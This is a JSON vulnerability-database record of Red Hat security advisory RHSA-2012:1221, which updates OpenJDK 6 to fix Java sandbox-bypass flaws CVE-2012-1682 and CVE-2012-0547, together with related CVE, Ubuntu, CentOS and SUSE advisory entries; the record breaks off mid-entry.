{"id": "RHSA-2012:1221", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:1221) Critical: java-1.6.0-openjdk security update", "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet could\nuse this flaw to use classes from restricted packages, allowing it to\nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.4. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "published": "2012-09-03T04:00:00", "modified": "2018-06-06T20:24:12", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2012:1221", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "lastseen": "2019-08-13T18:44:58", "viewCount": 0, "enchantments": {"score": {"value": 8.8, "vector": "NONE", "modified": "2019-08-13T18:44:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0547", "CVE-2012-1682"]}, {"type": "ubuntu", "idList": ["USN-1553-1"]}, {"type": "centos", "idList": ["CESA-2012:1222", "CESA-2012:1223", "CESA-2012:1221"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:1175-1", "SUSE-SU-2012:1148-1", "OPENSUSE-SU-2012:1154-1", "SUSE-SU-2012:1231-1"]}, {"type": "amazon", "idList": ["ALAS-2012-119"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1222", "ELSA-2012-1221", "ELSA-2012-1223"]}, {"type": "nessus", "idList": ["SUSE_11_JAVA-1_6_0-OPENJDK-120905.NASL", "REDHAT-RHSA-2012-1221.NASL", "SL_20120903_JAVA_1_6_0_OPENJDK_ON_SL6_X.NASL", "CENTOS_RHSA-2012-1222.NASL", "REDHAT-RHSA-2012-1222.NASL", "UBUNTU_USN-1553-1.NASL", "OPENSUSE-2012-601.NASL", "SL_20120903_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2012-1222.NASL", "CENTOS_RHSA-2012-1221.NASL"]}, {"type": "redhat", "idList": ["RHSA-2012:1225", "RHSA-2012:1392", "RHSA-2012:1289", "RHSA-2013:1455", "RHSA-2013:1456", "RHSA-2012:1466", "RHSA-2012:1223", "RHSA-2012:1222"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881482", "OPENVAS:1361412562310870821", "OPENVAS:1361412562310850325", "OPENVAS:1361412562310870820", "OPENVAS:870820", "OPENVAS:881482", "OPENVAS:1361412562310123833", "OPENVAS:841129", "OPENVAS:1361412562310123831", "OPENVAS:1361412562310120067"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28720", "SECURITYVULNS:VULN:12665"]}, {"type": "zdi", "idList": ["ZDI-12-197"]}, {"type": "seebug", "idList": ["SSV:60367"]}, {"type": "exploitdb", "idList": ["EDB-ID:20865"]}, {"type": "gentoo", "idList": ["GLSA-201406-32", "GLSA-201401-30"]}], "modified": "2019-08-13T18:44:58", "rev": 2}, "vulnersScore": 8.8}, "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "java-1.6.0-openjdk-src", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.49.1.11.4.el6_3.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "java-1.6.0-openjdk-javadoc", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.49.1.11.4.el6_3.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "java-1.6.0-openjdk-demo", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.49.1.11.4.el6_3.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-javadoc", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.49.1.11.4.el6_3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "java-1.6.0-openjdk", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.49.1.11.4.el6_3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-devel", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.49.1.11.4.el6_3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-src", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.49.1.11.4.el6_3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "java-1.6.0-openjdk-debuginfo", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-debuginfo-1.6.0.0-1.49.1.11.4.el6_3.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-demo", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.49.1.11.4.el6_3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "src", "packageName": "java-1.6.0-openjdk", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.49.1.11.4.el6_3.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "java-1.6.0-openjdk", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.49.1.11.4.el6_3.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "java-1.6.0-openjdk-debuginfo", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-debuginfo-1.6.0.0-1.49.1.11.4.el6_3.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "java-1.6.0-openjdk-devel", "packageVersion": "1.6.0.0-1.49.1.11.4.el6_3", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.49.1.11.4.el6_3.i686.rpm", "operator": "lt"}], "immutableFields": []}

{"cve": [{"lastseen": "2021-04-22T23:28:19", "description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans, a different vulnerability than CVE-2012-3136. NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to \"XMLDecoder security issue via ClassFinder.\"", "edition": 7, "cvss3": {}, "published": "2012-08-30T23:55:00", "title": "CVE-2012-1682", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1682"], "modified": "2013-10-31T03:24:00", "cpe": ["cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.7.0"], "id": "CVE-2012-1682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1682", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*"]}, {"lastseen": "2021-04-22T23:28:16", "description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier, and 6 Update 34 and earlier, has no impact and remote attack vectors involving AWT and \"a security-in-depth issue that is not directly exploitable but which can be used to aggravate security vulnerabilities that can be directly exploited.\" NOTE: this identifier was assigned by the Oracle CNA, but CVE is not intended to cover defense-in-depth issues that are only exposed by the presence of other vulnerabilities. NOTE: Oracle has not commented on claims from a downstream vendor that this issue is related to \"toolkit internals references.\"", "edition": 7, "cvss3": {}, "published": "2012-08-30T23:55:00", "title": "CVE-2012-0547", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 0.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 0.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0547"], "modified": "2017-08-04T01:29:00", "cpe": ["cpe:/a:sun:jdk:1.6.0", "cpe:/a:oracle:jre:1.6.0", "cpe:/a:sun:jre:1.6.0", "cpe:/a:oracle:jdk:1.6.0", "cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.7.0"], "id": "CVE-2012-0547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0547", "cvss": {"score": 0.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.6.0:update_30:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_22:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_22:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_31:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_30:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_29:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_24:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_25:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_27:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_35:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_31:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_27:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_33:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_24:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_23:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_29:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_34:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_26:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_25:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_32:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_26:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_23:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_33:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_34:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_32:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-02T11:39:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "It was discovered that the Beans component in OpenJDK 6 did not \nproperly prevent access to restricted classes. A remote attacker could \nuse this to create an untrusted Java applet or application that would \nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nIt was discovered that functionality in the AWT component in OpenJDK 6 \nmade it easier for a remote attacker, in conjunction with other \nvulnerabilities, to bypass Java sandbox restrictions. (CVE-2012-0547)", "edition": 5, "modified": "2012-09-03T00:00:00", "published": "2012-09-03T00:00:00", "id": "USN-1553-1", "href": "https://ubuntu.com/security/notices/USN-1553-1", "title": "OpenJDK 6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:32", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "**CentOS Errata and Security Advisory** CESA-2012:1222\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet could\nuse this flaw to use classes from restricted packages, allowing it to\nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-September/030878.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1222.html", "edition": 3, "modified": "2012-09-03T14:26:49", "published": "2012-09-03T14:26:49", "href": "http://lists.centos.org/pipermail/centos-announce/2012-September/030878.html", "id": "CESA-2012:1222", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:29:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "**CentOS Errata and Security Advisory** CESA-2012:1221\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet could\nuse this flaw to use classes from restricted packages, allowing it to\nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.4. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-September/030879.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1221.html", "edition": 3, "modified": "2012-09-03T14:36:46", "published": "2012-09-03T14:36:46", "href": "http://lists.centos.org/pipermail/centos-announce/2012-September/030879.html", "id": "CESA-2012:1221", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:29:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3136", "CVE-2012-0547", "CVE-2012-4681", "CVE-2012-1682"], "description": "**CentOS Errata and Security Advisory** CESA-2012:1223\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple improper permission check issues were discovered in the Beans\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-4681,\nCVE-2012-1682, CVE-2012-3136)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-September/030880.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1223.html", "edition": 3, "modified": "2012-09-03T14:37:23", "published": "2012-09-03T14:37:23", "href": "http://lists.centos.org/pipermail/centos-announce/2012-September/030880.html", "id": "CESA-2012:1223", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:27:16", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "The icedtea-web Java plugin was updated to 1.11.4 to fix\n critical security issues:\n\n * Security fixes\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references\n * OpenJDK\n - S7182135: Impossible to use some editors directly\n - S7185678:\n java/awt/Menu/NullMenuLabelTest/NullMenuLabelTest.java\n failed with NPE\n\n", "edition": 1, "modified": "2012-09-14T14:13:53", "published": "2012-09-14T14:13:53", "id": "OPENSUSE-SU-2012:1175-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-09/msg00019.html", "type": "suse", "title": "java-1_6_0-openjdk: icedtea-web update to 1.11.4 (bnc#) (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:46", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "The following security issues have been fixed:\n\n * S7162476, CVE-2012-1682: XMLDecoder security issue\n via ClassFinder\n * S7163201, CVE-2012-0547: Simplify toolkit internals\n references\n", "edition": 1, "modified": "2012-09-12T06:08:36", "published": "2012-09-12T06:08:36", "id": "SUSE-SU-2012:1148-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-09/msg00006.html", "type": "suse", "title": "Security update for OpenJDK (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3136", "CVE-2012-0547", "CVE-2012-4681", "CVE-2012-1682"], "description": "Java-1_7_0-openjdk was updated to fix a remote exploit\n (CVE-2012-4681).\n\n Also bugfixes were done:\n - fix build on ARM and i586\n - remove files that are no longer used\n\n\n - zero build can be enabled using rpmbuild (osc build)\n --with zero\n - add hotspot 2.1 needed for zero\n - fix filelist on %{ix86}\n\n * Security fixes\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n - S7194567, CVE-2012-3136: Improve long term persistence\n of java.beans objects\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references\n - RH852051, CVE-2012-4681, S7162473: Reintroduce\n PackageAccessible checks removed in 6788531.\n * OpenJDK\n - Fix Zero FTBFS issues with 2.3\n - S7180036: Build failure in Mac platform caused by fix #\n 7163201\n - S7182135: Impossible to use some editors directly\n - S7183701: [TEST]\n closed/java/beans/security/TestClassFinder.java \u00c3\u00a2\u00c2\u0080\u00c2\u0093\n compilation failed\n - S7185678:\n java/awt/Menu/NullMenuLabelTest/NullMenuLabelTest.java\n failed with NPE\n * Bug fixes\n - PR1149: Zero-specific patch files not being packaged\n - use icedtea tarball for build again, this led into\n following dropped files because the are already in the\n tarball and simplified %prep and %build\n - drop class-rewriter.tar.gz\n - drop systemtap-tapset.tar.gz\n - drop desktop-files.tar.gz\n - drop nss.cfg\n - drop pulseaudio.tar.gz\n - drop remove-intree-libraries.sh\n - add archives from icedtea7-forest-2.3 for openjdk,\n corba, jaxp, jaxws, jdk, langtools and hotspot\n - drop rhino.patch, pulse-soundproperties and systemtap\n patch\n - move gnome bridge patches before make as it's irritating\n to have the patch fail after openjdk is built\n - use explicit file attributes in %files sections to\n prevent the file permissions problems in a future (like\n bnc#770040)\n - changed version scheme, so it now matches Oracle Java\n 1.7.0.6 == Java7 u 6\n\n - update to icedtea-2.3.1 / OpenJDK7 u6 (bnc#777499)\n * Security fixes\n - RH852051, CVE-2012-4681: Reintroduce PackageAccessible\n checks removed in 6788531.\n * Bug fixes\n - PR902: PulseAudioClip getMicrosecondsLength() returns\n length in milliseconds, not microseconds\n - PR986: IcedTea7 fails to build with IcedTea6 CACAO due\n to low max heapsize\n - PR1050: Stream objects not garbage collected\n - PR1119: Only add classes to rt-source-files.txt if the\n class (or one or more of its methods/fields) are\n actually missing from the boot JDK\n - PR1137: Allow JARs to be optionally compressed by\n setting COMPRESS_JARS\n * OpenJDK\n - Make dynamic support for GConf work again.\n - PR1095: Add configure option for -Werror\n - PR1101: Undefined symbols on GNU/Linux SPARC\n - PR1140: Unnecessary diz files should not be installed\n - S7192804, PR1138: Build should not install jvisualvm\n man page for OpenJDK\n * JamVM\n - ARMv6 armhf: Changes for Raspbian (Raspberry Pi)\n - PPC: Don't use lwsync if it isn't supported\n - X86: Generate machine-dependent stubs for i386\n - When suspending, ignore detached threads that have\n died, this prevents a user caused deadlock when an\n external thread has been attached to the VM via JNI and\n it has exited without detaching\n - Add missing REF_TO_OBJs for references passed from JNI,\n this enable JamVM to run Qt-Jambi\n - there are number of fixes in 2.3, see NEWS\n\n", "edition": 1, "modified": "2012-09-12T19:08:39", "published": "2012-09-12T19:08:39", "id": "OPENSUSE-SU-2012:1154-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-09/msg00008.html", "type": "suse", "title": "java-1_7_0-openjdk: security fix for remote exploit (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:23:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1725", "CVE-2012-1719", "CVE-2012-3136", "CVE-2012-1726", "CVE-2012-0551", "CVE-2012-1717", "CVE-2012-1721", "CVE-2012-1713", "CVE-2012-1716", "CVE-2012-1718", "CVE-2012-1722", "CVE-2012-0547", "CVE-2012-4681", "CVE-2012-1682"], "description": "IBM Java 1.7.0 was updated to SR2 which fixes critical\n security issues.\n", "edition": 1, "modified": "2012-09-25T00:09:19", "published": "2012-09-25T00:09:19", "id": "SUSE-SU-2012:1231-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-09/msg00032.html", "title": "Security update for IBM Java (important)", 